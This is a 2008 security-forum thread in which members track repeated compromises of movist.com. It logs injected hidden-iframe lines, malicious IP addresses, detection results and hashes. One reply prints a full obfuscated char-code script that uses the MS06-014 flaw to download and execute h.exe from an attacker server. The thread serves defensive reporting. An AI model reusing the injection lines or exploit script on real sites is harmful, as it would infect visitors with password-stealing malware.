Author Topic: movist.com  (Read 10347 times)

0 Members and 1 Guest are viewing this topic.

March 10, 2008, 11:09:01 pm
Read 10347 times

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
Quote
hxxp://www.movist.com/
       hxxp://www.movist.com/inc/cssjs/movist.js
            document.write('<IFrame height=0 width=0 src="hxxp://121.125.78.130/comm.htm"></iframe>');
                    1) hxxp://121.125.78.130/H.exe
                    2) MS06-014
                    3) Dr.Web : Trojan.PWS.Gamania.7879
                        V3 : x
                        NOD32 : x
                        Hauri : x
            document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/wab/logo.gef'></iframe>");
                    x

March 11, 2008, 12:08:42 am
Reply #1

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Thank you.

March 11, 2008, 10:50:00 pm
Reply #2

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
march. 10. 2008

Quote
document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/wab/logo.gef'></iframe>");

I think that chinese cracker have some mistake.

logo.gef (x)




so, today, movist.com

Quote
//document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/web/logo.gif'></iframe>");

download malware from

Quote
hxxp://www.17173.com.my/pic/ok.hlp

1) MS06-014
2) NOD32 : x
   Dr.Web : Trojan.PWS.Gamania.6598
   V3 : x
   Virobot : x

 
I guess chinese cracker.... anther mistake... he didn't remove "//"

March 12, 2008, 04:43:01 pm
Reply #3

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Yeah, when I tried the other day it didn't work. Thanks ;)

March 13, 2008, 12:48:20 am
Reply #4

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
first :
Quote
hxxp://222.233.53.126/help.htm
second :
Quote
hxxp://121.125.78.130/comm.htm
third :
Quote
hxxp://naver.8866.org/wab/logo.gef

fourth, today(March 13, 2008, 09:51:01 AM) GMT+9

Quote
document.write('<IframE height=0 width=0 src="hxxp://222.233.53.123/help.htm"></iFramE>');
Quote
hxxp://www.movist.com/inc/cssjs/movist.js


March 13, 2008, 06:26:47 am
Reply #5

crunchtime

  • Special Access
  • Full Member

  • Offline
  • *

  • 54
Quote
hxxp://222.233.53.126/help.htm
Current help.html code:
Code: [Select]
<script>
t="60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,115,99,114,105,112,116,34,62,13,10,102,117,110,99,116,105,111,110,32,105,110,105,116,40,41,32,123,32,13,10,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,78,111,32,119,101,98,32,115,105,116,101,32,105,115,32,99,111,110,102,105,103,117,114,101,100,32,97,116,32,116,104,105,115,32,97,100,100,114,101,115,115,46,34,41,59,13,10,13,10,125,13,10,119,105,110,100,111,119,46,111,110,108,111,97,100,32,61,32,105,110,105,116,59,13,10,60,47,115,99,114,105,112,116,62,13,10,60,104,116,109,108,62,13,10,60,116,105,116,108,101,62,52,48,52,60,47,116,105,116,108,101,62,13,10,60,47,104,116,109,108,62,13,10,60,115,99,114,105,112,116,32,108,97,110,103,117,97,103,101,61,34,86,66,83,99,114,105,112,116,34,62,13,10,79,110,32,69,114,114,111,114,32,82,101,115,117,109,101,32,78,101,120,116,13,10,101,120,101,32,61,32,34,104,116,116,112,58,47,47,50,50,50,46,50,51,51,46,53,51,46,49,50,54,47,104,46,101,120,101,34,13,10,120,49,61,34,111,34,38,34,98,106,34,38,34,101,34,38,34,99,116,34,13,10,120,50,61,34,99,108,115,34,38,34,105,100,58,66,68,57,34,38,34,54,67,53,34,38,34,53,54,45,54,34,38,34,53,34,38,34,65,51,45,49,34,38,34,49,68,34,38,34,48,45,57,56,34,38,34,51,34,38,34,65,45,48,48,34,38,34,67,48,34,38,34,52,70,34,38,34,67,50,34,38,34,57,69,51,54,34,13,10,120,51,61,34,99,34,38,34,108,97,34,38,34,115,115,34,38,34,105,100,34,13,10,120,52,61,34,77,105,99,34,38,34,114,111,115,111,34,38,34,102,116,46,88,77,34,38,34,76,72,84,34,38,34,84,80,34,13,10,120,53,61,34,65,100,34,38,34,111,100,34,38,34,98,46,83,116,34,38,34,114,34,38,34,101,97,109,34,13,10,120,54,61,34,71,34,38,34,69,84,34,13,10,120,55,61,34,83,99,114,34,38,34,105,112,34,38,34,116,105,110,103,46,70,105,108,34,38,34,101,83,34,38,34,121,115,116,34,38,34,101,109,79,34,38,34,98,106,101,99,116,34,13,10,120,56,61,34,83,104,101,34,38,34,108,108,46,65,34,38,34,112,112,108,34,38,34,105,99,97,116,105,34,38,34,111,110,34,13,10,13,10,83,101,116,32,118,118,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,120,49,41,13,10,118,118,46,83,101,116,65,116,116,114,105,98,117,116,101,32,120,51,44,32,120,50,13,10,88,77,76,72,84,84,80,61,120,52,13,10,83,101,116,32,120,32,61,32,118,118,46,67,114,101,97,116,101,79,98,106,101,99,116,40,88,77,76,72,84,84,80,44,34,34,41,13,10,68,53,61,120,53,13,10,68,54,61,68,53,13,10,83,101,116,32,83,32,61,32,118,118,46,67,114,101,97,116,101,79,98,106,101,99,116,40,68,54,44,34,34,41,13,10,83,46,116,121,112,101,32,61,32,49,13,10,118,118,50,61,34,71,69,84,34,13,10,120,46,79,112,101,110,32,118,118,50,44,32,101,120,101,44,32,70,97,108,115,101,13,10,120,46,83,101,110,100,13,10,102,110,97,109,101,49,61,34,118,118,46,99,111,109,34,13,10,83,101,116,32,70,32,61,32,118,118,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,44,34,34,41,13,10,83,101,116,32,116,109,112,32,61,32,70,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,40,50,41,13,10,102,110,97,109,101,49,61,32,70,46,66,117,105,108,100,80,97,116,104,40,116,109,112,44,102,110,97,109,101,49,41,13,10,83,46,111,112,101,110,13,10,83,46,119,114,105,116,101,32,120,46,114,101,115,112,111,110,115,101,66,111,100,121,13,10,83,46,115,97,118,101,116,111,102,105,108,101,32,102,110,97,109,101,49,44,50,13,10,83,46,99,108,111,115,101,13,10,83,101,116,32,81,32,61,32,118,118,46,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,104,101,108,108,46,65,112,112,108,105,99,97,116,105,111,110,34,44,34,34,41,13,10,81,46,83,104,101,108,108,69,120,101,99,117,116,101,32,102,110,97,109,101,49,44,34,34,44,34,34,44,34,111,112,101,110,34,44,48,13,10,60,47,115,99,114,105,112,116,62"
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>

Downloads this:
Quote
hxxp://222.233.53.126/h.exe

VirusTotal results for h.exe:
File h.exe received on 03.12.2008 02:57:08 (CET)
Current status: finished
Result: 14/32 (43.75%)

March 13, 2008, 03:13:35 pm
Reply #6

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

March 15, 2008, 08:10:53 am
Reply #7

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
again, again, again!!! cracked movist.com

5th : today(March 15, 2008, 05:21:01 PM) GMT+9

Quote
hxxp://www.movist.com/
     <iframe src=hxxp://222.233.53.123/help.htm width=0 height=0></iframe>
              -hxxp://222.233.53.123/h.exe
     <script src=hxxp://222.233.53.123/help.htm></script>
              - hxxp://222.233.53.123/h.exe

Quote
hxxp://www.movist.com/inc/cssjs/movist.js
     document.write('<IframE height=0 width=0 src="hxxp://222.233.53.123/help.htm"></iFramE>');
              - hxxp://222.233.53.123/h.exe
     docdsument.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/web/logo.gif'></iframe>");
              - hxxp://www.17173.com.my/pic/ok.hlp
                         same url

March 17, 2008, 12:54:42 pm
Reply #8

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
6th : today(March 17, 2008, 09:48:01 PM) GMT+9

Quote
document.write('<iframe height=0 width=0 src="hxxp://www.eosoccer.com/images/icon/bu_arrow.gif"></iframe>');

Quote
hxxp://www.movist.com/
         hxxp://www.movist.com/inc/cssjs/movist.js
                 hxxp://img8.zol.com.cn/bbs/upload/205/204945_600.jpg
                      - hot picture!
                 hxxp://www.eosoccer.com/images/icon/bu_arrow.gif
                      - hxxp://121.125.78.130/h.exe
                      - MS06-014 exploit

7th : today(March 17, 2008, 11:28:01 PM) GMT+9
changed url

Quote
hxxp://www.movist.com/
         hxxp://www.movist.com/inc/cssjs/movist.js
                    document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/web/logo.gif'></iframe>");

8th : today(March 18, 2008, 09:01:01 AM) GMT+9

Quote
hxxp://www.movist.com/
         <iframe height=0 width=0 src="hxxp://121.125.78.130/help.htm"></iframe>
                    hxxp://121.125.78.130/h.exe
         hxxp://www.movist.com/inc/cssjs/movist.js
                    document.write('<iframe height=0 width=0 src="hxxp://121.125.78.130/help.htm"></iframe>');
                                   hxxp://121.125.78.130/h.exe
                   document.write("<iframe width='0' height='0' src='hxxp://naver.8866.org/web/logo.gif'></iframe>");

March 20, 2008, 11:28:07 am
Reply #9

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
9th : today(March 20, 2008, 08:28:01 PM) GMT+9

Quote
hxxp://www.movist.com/
              hxxp://www.movist.com/inc/cssjs/movist.js
                            document.write('<iframe height=0 width=0 src="hxxp://221.143.51.212:89/index.htm"></iframe>');

March 22, 2008, 12:05:08 am
Reply #10

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
10th : today(March 22, 2008, 09:04:01 AM) GMT+9
.
Quote
hxxp://www.movist.com/inc/cssjs/movist.js
        document.write('<iframe height=0 width=0 src="hxxp://221.143.51.212:89/index.htm"></iframe>');
        document.write('<iframe height=0 width=0 src="hxxp://221.143.51.218/info/index.htm"></iframe>');
                hxxp://221.143.51.218/h.exe
                MD5 : 1C86558637B7CFEBA721B89D69A62CAB

March 23, 2008, 07:08:34 am
Reply #11

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
11th : today(March 23, 2008, 04:07:01 PM) GMT+9

Quote
hxxp://www.movist.com/inc/cssjs/movist.js
             document.write('<iframe height=0 width=0 src="hxxp://221.139.48.211:81/index.htm"></iframe>');
                         hxxp://221.139.48.211:81/h.exe
                                  MD5 : 1C86558637B7CFEBA721B89D69A62CAB
                                  same file
             document.write('<iframe height=0 width=0 src="hxxp://221.143.51.212:89/index.htm"></iframe>');
                         - same url

March 30, 2008, 11:05:52 pm
Reply #12

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
March 31, 2008, 08:05:01 AM(GMT+9)

Quote
document.write('<iframe height=0 width=0 src="hxxp://www.musicmoa.net/fla/index.htm"></iframe>');
        hxxp://www.musicmoa.net/fla/H.exe

May 09, 2008, 12:24:41 pm
Reply #13

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
May 09, 2008, 09:23:05 PM(GMT+9)

Quote
hxxp://www.movist.com/
        hxxp://211.239.121.161/index.html/
                hxxp://211.239.121.161/H.exe


May 09, 2008, 08:40:14 pm
Reply #14

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Thank you.